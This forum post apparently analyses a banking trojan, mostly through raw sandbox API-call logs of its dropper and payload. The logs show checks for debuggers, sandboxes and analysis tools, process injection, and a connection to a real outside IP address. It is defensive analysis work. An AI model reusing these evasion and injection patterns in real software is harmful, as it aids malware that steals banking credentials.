Information Security / Malware Analysis and Design / Re: Banking trojan II (different configuration). on: 16 February 2013, 14:40
Analysis of the file "projeto.exe":

Code:
Executing: c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(wininet.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(normaliz.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(urlmon.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(iertutil.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
VirtualQueryEx(c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcessToken(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\Projeto.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
ResumeThread() [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(Advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(LPK.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(Projeto.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(USER32.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
IsDebuggerPresent() [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
BitBlt() [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
FreeLibrary() [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(dbghelp.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(SbieDll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(wsock32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(shell32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateEvent(ShellCopyEngineRunning) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(EXPLORER.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(setupapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(rpcrt4.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetComputerName() [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateEvent(ShellCopyEngineFinished) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateProcess((null),C:\WINDOWS\winsa64.exe,C:\WINDOWS) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(winlogon.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(advapi32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(c:\windows\system32\apphelp.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
WriteProcessMemory(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_READWRITE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
ExitProcess(0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
Executing: c:\windows\winsa64.exe
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,103000,PAGE_READWRITE) [c:\windows\winsa64.exe]
OpenProcess(wireshark.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(u1210.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(kernel32.dll) [c:\windows\winsa64.exe]
LoadLibrary(user32.dll) [c:\windows\winsa64.exe]
LoadLibrary(advapi32.dll) [c:\windows\winsa64.exe]
LoadLibrary(oleaut32.dll) [c:\windows\winsa64.exe]
LoadLibrary(msvcrt.dll) [c:\windows\winsa64.exe]
LoadLibrary(ole32.dll) [c:\windows\winsa64.exe]
LoadLibrary(version.dll) [c:\windows\winsa64.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(gdi32.dll) [c:\windows\winsa64.exe]
LoadLibrary(wininet.dll) [c:\windows\winsa64.exe]
LoadLibrary(shlwapi.dll) [c:\windows\winsa64.exe]
LoadLibrary(normaliz.dll) [c:\windows\winsa64.exe]
LoadLibrary(urlmon.dll) [c:\windows\winsa64.exe]
LoadLibrary(iertutil.dll) [c:\windows\winsa64.exe]
LoadLibrary(comctl32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(lz32.dll) [c:\windows\winsa64.exe]
LoadLibrary(lz32.dll) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_READWRITE) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_READWRITE) [c:\windows\winsa64.exe]
GetModuleHandle(kernel32.dll) [c:\windows\winsa64.exe]
VirtualQueryEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe) [c:\windows\winsa64.exe]
GetModuleHandle(Kernel32) [c:\windows\winsa64.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\windows\winsa64.exe]
OpenProcessToken(C:\WINDOWS\winsa64.exe) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\windows\winsa64.exe]
OpenProcess(jsobs.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
ResumeThread() [c:\windows\winsa64.exe]
OpenProcess(PE Explorer (portable).exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(idag.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(Advapi32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(LPK.DLL) [c:\windows\winsa64.exe]
OpenProcess(winsa64.exe) [c:\windows\winsa64.exe]
GetModuleHandle(USER32) [c:\windows\winsa64.exe]
LoadLibrary(imm32.dll) [c:\windows\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\windows\winsa64.exe]
OpenProcess(notepad.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(EvO_DBG.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_NOACCESS) [c:\windows\winsa64.exe]
GetModuleHandle(oleaut32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(USER32.DLL) [c:\windows\winsa64.exe]
GetModuleHandle(comctl32.dll) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\windows\winsa64.exe]
IsDebuggerPresent() [c:\windows\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\windows\winsa64.exe]
BitBlt() [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_EXECUTE_READWRITE) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\windows\winsa64.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\windows\winsa64.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
GetModuleHandle(version.dll) [c:\windows\winsa64.exe]
FreeLibrary() [c:\windows\winsa64.exe]
OpenMutex(ShimCacheMutex) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\windows\winsa64.exe]
GetModuleHandle(dbghelp.dll) [c:\windows\winsa64.exe]
GetModuleHandle(SbieDll.dll) [c:\windows\winsa64.exe]
LoadLibrary(wsock32.dll) [c:\windows\winsa64.exe]
LoadLibrary(ws2_32.dll) [c:\windows\winsa64.exe]
LoadLibrary(ws2help.dll) [c:\windows\winsa64.exe]
LoadLibrary(shell32.dll) [c:\windows\winsa64.exe]
CreateMutex(INSONIA) [c:\windows\winsa64.exe]
CreateFile(C:\WINDOWS\winsa64.cfg) [c:\windows\winsa64.exe]
Sleep(100) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\mswsock.dll) [c:\windows\winsa64.exe]
LoadLibrary(hnetcfg.dll) [c:\windows\winsa64.exe]
LoadLibrary(rpcrt4.dll) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\wshtcpip.dll) [c:\windows\winsa64.exe]
LoadLibrary(dnsapi.dll) [c:\windows\winsa64.exe]
LoadLibrary(iphlpapi.dll) [c:\windows\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(c:\windows\system32\winrnr.dll) [c:\windows\winsa64.exe]
LoadLibrary(wldap32.dll) [c:\windows\winsa64.exe]
LoadLibrary(rasadhlp.dll) [c:\windows\winsa64.exe]
GetModuleHandle(ws2_32.dll) [c:\windows\winsa64.exe]
connect( 212.1.208.24:80 ) [c:\windows\winsa64.exe]
DeleteFile(C:\WINDOWS\a.exe) [c:\windows\winsa64.exe]
Sleep(60000000) [c:\windows\winsa64.exe]

It downloads two files, "winsa64.exe" and the file "winsa64.cfg", which contains the associated no-ip domain:

Analysis of the file "winsa64.exe" (API log):

Code:
Executing: c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(wininet.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(normaliz.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(urlmon.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(iertutil.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
VirtualQueryEx(c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcessToken(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
ResumeThread() [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(Advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(LPK.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(USER32.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
IsDebuggerPresent() [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
BitBlt() [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
FreeLibrary() [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(dbghelp.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(SbieDll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(wsock32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(shell32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateEvent(ShellCopyEngineRunning) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(EXPLORER.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(setupapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(rpcrt4.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetComputerName() [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateEvent(ShellCopyEngineFinished) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateProcess((null),C:\WINDOWS\winsa64.exe,C:\WINDOWS) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(winlogon.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(advapi32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
WriteProcessMemory(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_READWRITE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
ExitProcess(0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(u1210.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
Executing: c:\windows\winsa64.exe
OpenProcess(wireshark.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,103000,PAGE_READWRITE) [c:\windows\winsa64.exe]
OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(iexplore.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(firefox.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(kernel32.dll) [c:\windows\winsa64.exe]
LoadLibrary(user32.dll) [c:\windows\winsa64.exe]
LoadLibrary(advapi32.dll) [c:\windows\winsa64.exe]
